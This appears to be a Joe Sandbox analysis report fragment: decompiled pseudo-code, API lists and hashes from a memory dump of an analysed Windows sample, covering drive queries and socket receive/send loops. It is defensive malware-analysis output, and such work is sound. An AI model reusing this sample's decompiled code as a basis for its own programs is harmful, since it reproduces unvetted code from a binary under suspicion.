                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: _allshl
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 435966717-0
                                                                                                                                                                                                                                                                                    • Opcode ID: d51c0cfb7cecbe22f3a005448584aa28a11641046ad401d5bf26070a09b22ed4
                                                                                                                                                                                                                                                                                    • Instruction ID: a1b14869e86cb328d4ae7b27d3c95eded15a07d37ad0fd28e3103b9823fe5a09
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d51c0cfb7cecbe22f3a005448584aa28a11641046ad401d5bf26070a09b22ed4
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4F03172901429AB9710EEEF84824CAFBE69F88364B118576FC18E3270E9709D1146F2
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E0040DD00(intOrPtr* __ebx, void* __edi) {
                                                                                                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t18;
                                                                                                                                                                                                                                                                                    				intOrPtr _t23;
                                                                                                                                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                                                                                                                                    				void* _t28;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t18 = __ebx;
                                                                                                                                                                                                                                                                                    				if(__ebx != 0 &&  *__ebx == 0x756470) {
                                                                                                                                                                                                                                                                                    					SetEvent( *(__ebx + 0x10));
                                                                                                                                                                                                                                                                                    					WaitForSingleObject( *(__ebx + 0x14), 0xffffffff);
                                                                                                                                                                                                                                                                                    					CloseHandle( *(__ebx + 0x14));
                                                                                                                                                                                                                                                                                    					_t26 =  *((intOrPtr*)(__ebx + 0x20));
                                                                                                                                                                                                                                                                                    					if(_t26 == 0) {
                                                                                                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                                                                                                    						E00409600( *((intOrPtr*)(_t18 + 8)));
                                                                                                                                                                                                                                                                                    						return E00408C70(_t18);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                                                                    						E00408C70( *((intOrPtr*)(_t26 + 0x18)));
                                                                                                                                                                                                                                                                                    						_t23 =  *((intOrPtr*)(_t26 + 0x1c));
                                                                                                                                                                                                                                                                                    						E00408C70(_t26);
                                                                                                                                                                                                                                                                                    						_t28 = _t28 + 8;
                                                                                                                                                                                                                                                                                    						_t26 = _t23;
                                                                                                                                                                                                                                                                                    					} while (_t23 != 0);
                                                                                                                                                                                                                                                                                    					goto L6;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t8;
                                                                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                                                                    0x0040dd00
                                                                                                                                                                                                                                                                                    0x0040dd02
                                                                                                                                                                                                                                                                                    0x0040dd11
                                                                                                                                                                                                                                                                                    0x0040dd1d
                                                                                                                                                                                                                                                                                    0x0040dd27
                                                                                                                                                                                                                                                                                    0x0040dd2d
                                                                                                                                                                                                                                                                                    0x0040dd32
                                                                                                                                                                                                                                                                                    0x0040dd51
                                                                                                                                                                                                                                                                                    0x0040dd55
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040dd63
                                                                                                                                                                                                                                                                                    0x0040dd35
                                                                                                                                                                                                                                                                                    0x0040dd39
                                                                                                                                                                                                                                                                                    0x0040dd3e
                                                                                                                                                                                                                                                                                    0x0040dd42
                                                                                                                                                                                                                                                                                    0x0040dd47
                                                                                                                                                                                                                                                                                    0x0040dd4a
                                                                                                                                                                                                                                                                                    0x0040dd4c
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040dd50
                                                                                                                                                                                                                                                                                    0x0040dd64

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,0040DDF5,?,?,0040BF1E,00000000), ref: 0040DD11
                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,0040DDF5,?,?,0040BF1E,00000000), ref: 0040DD1D
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040DD27
                                                                                                                                                                                                                                                                                      • Part of subcall function 00408C70: HeapFree.KERNEL32(00000000,00000000,00401192), ref: 00408CCB
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                                                                                                                                                                                                                                    • String ID: pdu
                                                                                                                                                                                                                                                                                    • API String ID: 309973729-2320407122
                                                                                                                                                                                                                                                                                    • Opcode ID: ec457a0ef5b77bc146b0fe158738aa773204c9d46a9fd8b8c2a6535aafe8bc7d
                                                                                                                                                                                                                                                                                    • Instruction ID: 47894c430adc079fffee70a5773b5e3dad97f275ab1eff5073097a11c037a3ac
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec457a0ef5b77bc146b0fe158738aa773204c9d46a9fd8b8c2a6535aafe8bc7d
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 72F0C872804210ABCB20AFA5EC84D5777785F45320304466EFD4467396CA38DC45C7B8
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00404BD0(WCHAR* _a4) {
                                                                                                                                                                                                                                                                                    				int _v8;
                                                                                                                                                                                                                                                                                    				short _v1052;
                                                                                                                                                                                                                                                                                    				intOrPtr _v1056;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v8 = GetDriveTypeW(_a4);
                                                                                                                                                                                                                                                                                    				_v1056 = _v8;
                                                                                                                                                                                                                                                                                    				if(_v1056 >= 2) {
                                                                                                                                                                                                                                                                                    					if(_v1056 <= 3 || _v1056 == 6) {
                                                                                                                                                                                                                                                                                    						if(QueryDosDeviceW(_a4,  &_v1052, 0x208) != 0 && StrCmpNW( &_v1052, L"\\??\\", 4) == 0) {
                                                                                                                                                                                                                                                                                    							_v8 = 1;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                                                    			}






                                                                                                                                                                                                                                                                                    0x00404be3
                                                                                                                                                                                                                                                                                    0x00404be9
                                                                                                                                                                                                                                                                                    0x00404bf6
                                                                                                                                                                                                                                                                                    0x00404bff
                                                                                                                                                                                                                                                                                    0x00404c24
                                                                                                                                                                                                                                                                                    0x00404c3e
                                                                                                                                                                                                                                                                                    0x00404c3e
                                                                                                                                                                                                                                                                                    0x00404c24
                                                                                                                                                                                                                                                                                    0x00404bff
                                                                                                                                                                                                                                                                                    0x00404c4b

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDriveTypeW.KERNEL32(00404C8F), ref: 00404BDD
                                                                                                                                                                                                                                                                                    • QueryDosDeviceW.KERNEL32(00404C8F,?,00000208), ref: 00404C1C
                                                                                                                                                                                                                                                                                    • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00404C34
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: DeviceDriveQueryType
                                                                                                                                                                                                                                                                                    • String ID: \??\
                                                                                                                                                                                                                                                                                    • API String ID: 1681518211-3047946824
                                                                                                                                                                                                                                                                                    • Opcode ID: 84def6f5971ed18c5027915d3437ea3a00eaa7db189a83ce85c670b15ed75c6e
                                                                                                                                                                                                                                                                                    • Instruction ID: 6661d798698d2c2b86e5031d8900814977fd28410c715a717113d467a9626b5b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 84def6f5971ed18c5027915d3437ea3a00eaa7db189a83ce85c670b15ed75c6e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 26014FB494520CEBDF64CF95CE48AD977B4AB84701F0081BAAB05A7280D6789EC5CF9C
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 64%
                                                                                                                                                                                                                                                                                    			E0040DAD0(char* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                                                                    				short _v18;
                                                                                                                                                                                                                                                                                    				short _v22;
                                                                                                                                                                                                                                                                                    				short _v26;
                                                                                                                                                                                                                                                                                    				short _v28;
                                                                                                                                                                                                                                                                                    				short _v30;
                                                                                                                                                                                                                                                                                    				char _v32;
                                                                                                                                                                                                                                                                                    				char _v36;
                                                                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                                                                    				intOrPtr _v44;
                                                                                                                                                                                                                                                                                    				char _v56;
                                                                                                                                                                                                                                                                                    				intOrPtr _v68;
                                                                                                                                                                                                                                                                                    				char* _t23;
                                                                                                                                                                                                                                                                                    				short _t26;
                                                                                                                                                                                                                                                                                    				long _t29;
                                                                                                                                                                                                                                                                                    				short _t34;
                                                                                                                                                                                                                                                                                    				intOrPtr _t37;
                                                                                                                                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                                                                                                                                    				long _t47;
                                                                                                                                                                                                                                                                                    				signed int _t48;
                                                                                                                                                                                                                                                                                    				void* _t50;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t40 = __edx;
                                                                                                                                                                                                                                                                                    				_t50 = (_t48 & 0xfffffff8) - 0x1c;
                                                                                                                                                                                                                                                                                    				_t34 = 0;
                                                                                                                                                                                                                                                                                    				_t43 = _a4;
                                                                                                                                                                                                                                                                                    				_v28 = 0;
                                                                                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                                                                                    					_t23 =  &_v32;
                                                                                                                                                                                                                                                                                    					_v32 = 0;
                                                                                                                                                                                                                                                                                    					__imp__#10( *(_t43 + 8), 0x4004667f, _t23);
                                                                                                                                                                                                                                                                                    					if(_t23 == 0xffffffff) {
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t37 = _v44;
                                                                                                                                                                                                                                                                                    					if(_t37 != 0) {
                                                                                                                                                                                                                                                                                    						if(_t34 == 0 || _v40 < _t37) {
                                                                                                                                                                                                                                                                                    							_v40 = _t37;
                                                                                                                                                                                                                                                                                    							_t26 = E00408B60(_t37, _t40, _t34, _t37);
                                                                                                                                                                                                                                                                                    							_t37 = _v44;
                                                                                                                                                                                                                                                                                    							_t50 = _t50 + 8;
                                                                                                                                                                                                                                                                                    							_t34 = _t26;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_v30 = 0;
                                                                                                                                                                                                                                                                                    						_v26 = 0;
                                                                                                                                                                                                                                                                                    						_v22 = 0;
                                                                                                                                                                                                                                                                                    						_v18 = 0;
                                                                                                                                                                                                                                                                                    						_t29 =  *(_t43 + 8);
                                                                                                                                                                                                                                                                                    						_v32 = 0;
                                                                                                                                                                                                                                                                                    						_t40 =  &_v32;
                                                                                                                                                                                                                                                                                    						_v36 = 0x10;
                                                                                                                                                                                                                                                                                    						__imp__#17(_t29, _t34, _t37, 0,  &_v32,  &_v36);
                                                                                                                                                                                                                                                                                    						_t47 = _t29;
                                                                                                                                                                                                                                                                                    						if(_t47 != 0xffffffff && _t47 != 0) {
                                                                                                                                                                                                                                                                                    							InterlockedExchangeAdd(_t43 + 0x18, _t47);
                                                                                                                                                                                                                                                                                    							_t40 =  &_v56;
                                                                                                                                                                                                                                                                                    							E0040D9A0(_t43, _t34, _t47, _v68,  &_v56);
                                                                                                                                                                                                                                                                                    							_t50 = _t50 + 0x14;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				} while (WaitForSingleObject( *(_t43 + 0x10), 1) == 0x102);
                                                                                                                                                                                                                                                                                    				return E00408C70(_t34);
                                                                                                                                                                                                                                                                                    			}























                                                                                                                                                                                                                                                                                    0x0040dad0
                                                                                                                                                                                                                                                                                    0x0040dad6
                                                                                                                                                                                                                                                                                    0x0040dadb
                                                                                                                                                                                                                                                                                    0x0040dade
                                                                                                                                                                                                                                                                                    0x0040dae1
                                                                                                                                                                                                                                                                                    0x0040dae5
                                                                                                                                                                                                                                                                                    0x0040dae8
                                                                                                                                                                                                                                                                                    0x0040daf3
                                                                                                                                                                                                                                                                                    0x0040dafb
                                                                                                                                                                                                                                                                                    0x0040db04
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040db0a
                                                                                                                                                                                                                                                                                    0x0040db10
                                                                                                                                                                                                                                                                                    0x0040db18
                                                                                                                                                                                                                                                                                    0x0040db22
                                                                                                                                                                                                                                                                                    0x0040db26
                                                                                                                                                                                                                                                                                    0x0040db2b
                                                                                                                                                                                                                                                                                    0x0040db2f
                                                                                                                                                                                                                                                                                    0x0040db32
                                                                                                                                                                                                                                                                                    0x0040db32
                                                                                                                                                                                                                                                                                    0x0040db38
                                                                                                                                                                                                                                                                                    0x0040db3c
                                                                                                                                                                                                                                                                                    0x0040db40
                                                                                                                                                                                                                                                                                    0x0040db44
                                                                                                                                                                                                                                                                                    0x0040db4e
                                                                                                                                                                                                                                                                                    0x0040db51
                                                                                                                                                                                                                                                                                    0x0040db56
                                                                                                                                                                                                                                                                                    0x0040db60
                                                                                                                                                                                                                                                                                    0x0040db68
                                                                                                                                                                                                                                                                                    0x0040db6e
                                                                                                                                                                                                                                                                                    0x0040db73
                                                                                                                                                                                                                                                                                    0x0040db7e
                                                                                                                                                                                                                                                                                    0x0040db88
                                                                                                                                                                                                                                                                                    0x0040db91
                                                                                                                                                                                                                                                                                    0x0040db96
                                                                                                                                                                                                                                                                                    0x0040db96
                                                                                                                                                                                                                                                                                    0x0040db73
                                                                                                                                                                                                                                                                                    0x0040dba5
                                                                                                                                                                                                                                                                                    0x0040dbbf

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • ioctlsocket.WS2_32 ref: 0040DAFB
                                                                                                                                                                                                                                                                                    • recvfrom.WS2_32 ref: 0040DB68
                                                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040DB7E
                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040DB9F
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3980219359-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 42d21b16754e23747dafd69a251c4984d532d74facc10c73496740973b16efae
                                                                                                                                                                                                                                                                                    • Instruction ID: 93b40cc26d049a7996018c96e8ad19021b123b172151b20c2622c6b09396bf40
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 42d21b16754e23747dafd69a251c4984d532d74facc10c73496740973b16efae
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 33216FB1904305AFD314DF65DC84A6BB7E8EF84314F004A3EF459A2291E774A9488BAA
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 29%
                                                                                                                                                                                                                                                                                    			E0040EA30(char _a4) {
                                                                                                                                                                                                                                                                                    				long _v4;
                                                                                                                                                                                                                                                                                    				struct _OVERLAPPED* _v8;
                                                                                                                                                                                                                                                                                    				long _v12;
                                                                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                                                                    				signed int _t31;
                                                                                                                                                                                                                                                                                    				signed int _t32;
                                                                                                                                                                                                                                                                                    				signed int _t36;
                                                                                                                                                                                                                                                                                    				struct _OVERLAPPED* _t38;
                                                                                                                                                                                                                                                                                    				long _t43;
                                                                                                                                                                                                                                                                                    				char _t51;
                                                                                                                                                                                                                                                                                    				struct _OVERLAPPED* _t52;
                                                                                                                                                                                                                                                                                    				long* _t54;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t54 =  &_v12;
                                                                                                                                                                                                                                                                                    				_t51 = _a4;
                                                                                                                                                                                                                                                                                    				_t52 = 0;
                                                                                                                                                                                                                                                                                    				_v4 = 0;
                                                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                                                    				_t31 = GetQueuedCompletionStatus( *(_t51 + 8),  &_v4,  &_v12,  &_v8, 0xffffffff);
                                                                                                                                                                                                                                                                                    				_t43 = _v12;
                                                                                                                                                                                                                                                                                    				_t32 = _t31 & 0xffffff00 | _t31 != 0x00000000;
                                                                                                                                                                                                                                                                                    				if(_t43 == 0) {
                                                                                                                                                                                                                                                                                    					return _t32;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                                                                                    					if(_t32 == 0) {
                                                                                                                                                                                                                                                                                    						_t38 =  *((intOrPtr*)(_t43 + 0x260));
                                                                                                                                                                                                                                                                                    						__imp__WSAGetOverlappedResult(_t38, _v8,  &_v4, 0,  &_a4);
                                                                                                                                                                                                                                                                                    						if(_t38 == 0) {
                                                                                                                                                                                                                                                                                    							__imp__#111();
                                                                                                                                                                                                                                                                                    							_t52 = _t38;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_push(_t52);
                                                                                                                                                                                                                                                                                    					E0040E840(_v8, _v4, _v12);
                                                                                                                                                                                                                                                                                    					_t54 =  &(_t54[1]);
                                                                                                                                                                                                                                                                                    					_t52 = 0;
                                                                                                                                                                                                                                                                                    					_v4 = 0;
                                                                                                                                                                                                                                                                                    					_v12 = 0;
                                                                                                                                                                                                                                                                                    					_v8 = 0;
                                                                                                                                                                                                                                                                                    					_t36 = GetQueuedCompletionStatus( *(_t51 + 8),  &_v4,  &_v12,  &_v8, 0xffffffff);
                                                                                                                                                                                                                                                                                    					_t43 = _v12;
                                                                                                                                                                                                                                                                                    					_t32 = _t36 & 0xffffff00 | _t36 != 0x00000000;
                                                                                                                                                                                                                                                                                    				} while (_t43 != 0);
                                                                                                                                                                                                                                                                                    				return _t32;
                                                                                                                                                                                                                                                                                    			}















                                                                                                                                                                                                                                                                                    0x0040ea30
                                                                                                                                                                                                                                                                                    0x0040ea3c
                                                                                                                                                                                                                                                                                    0x0040ea53
                                                                                                                                                                                                                                                                                    0x0040ea57
                                                                                                                                                                                                                                                                                    0x0040ea5b
                                                                                                                                                                                                                                                                                    0x0040ea5f
                                                                                                                                                                                                                                                                                    0x0040ea63
                                                                                                                                                                                                                                                                                    0x0040ea65
                                                                                                                                                                                                                                                                                    0x0040ea6b
                                                                                                                                                                                                                                                                                    0x0040ea70
                                                                                                                                                                                                                                                                                    0x0040eaef
                                                                                                                                                                                                                                                                                    0x0040eaef
                                                                                                                                                                                                                                                                                    0x0040ea73
                                                                                                                                                                                                                                                                                    0x0040ea75
                                                                                                                                                                                                                                                                                    0x0040ea87
                                                                                                                                                                                                                                                                                    0x0040ea8f
                                                                                                                                                                                                                                                                                    0x0040ea97
                                                                                                                                                                                                                                                                                    0x0040ea99
                                                                                                                                                                                                                                                                                    0x0040ea9f
                                                                                                                                                                                                                                                                                    0x0040ea9f
                                                                                                                                                                                                                                                                                    0x0040ea97
                                                                                                                                                                                                                                                                                    0x0040eaad
                                                                                                                                                                                                                                                                                    0x0040eaae
                                                                                                                                                                                                                                                                                    0x0040eab3
                                                                                                                                                                                                                                                                                    0x0040eac9
                                                                                                                                                                                                                                                                                    0x0040eacd
                                                                                                                                                                                                                                                                                    0x0040ead1
                                                                                                                                                                                                                                                                                    0x0040ead5
                                                                                                                                                                                                                                                                                    0x0040ead9
                                                                                                                                                                                                                                                                                    0x0040eadb
                                                                                                                                                                                                                                                                                    0x0040eae1
                                                                                                                                                                                                                                                                                    0x0040eae4
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 0040EA63
                                                                                                                                                                                                                                                                                    • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 0040EA8F
                                                                                                                                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 0040EA99
                                                                                                                                                                                                                                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 0040EAD9
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2074799992-0
                                                                                                                                                                                                                                                                                    • Opcode ID: da4c304c9c1be7b6ec673d01c7b8ed459bae1c4d061c2b26b3558c89e2bae2e2
                                                                                                                                                                                                                                                                                    • Instruction ID: 57984d4194687ad85c3307d42481ebd1fe789462df0af38e0fad0134068e6b44
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da4c304c9c1be7b6ec673d01c7b8ed459bae1c4d061c2b26b3558c89e2bae2e2
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C213EB15083119BC600DF55D880D6BB7E8BFDCB64F044A2EF598A3250D734EA49CBAA
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 0040E768
                                                                                                                                                                                                                                                                                    • WSAGetLastError.WS2_32(?,?,0040EC84), ref: 0040E770
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000001,?,?,0040EC84), ref: 0040E786
                                                                                                                                                                                                                                                                                    • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 0040E7AC
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Recv$ErrorLastSleep
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3668019968-0
                                                                                                                                                                                                                                                                                    • Opcode ID: c27d7355d997e997ad15a14d69b16d301b2f1f4b418a8c27a866cefb6ec18630
                                                                                                                                                                                                                                                                                    • Instruction ID: ce078963949e4c85844abf3da7583f675a37e97f6c8ed4734d1f7ba0ccbfa151
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c27d7355d997e997ad15a14d69b16d301b2f1f4b418a8c27a866cefb6ec18630
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C211AD76104305AFD310CF65EC84EEBB7ECEB88700F40492AF945D3280E679E94997B2
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 0040E5EC
                                                                                                                                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 0040E5F2
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 0040E608
                                                                                                                                                                                                                                                                                    • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 0040E62A
                                                                                                                                                                                                                                                                                    Memory Dump Source
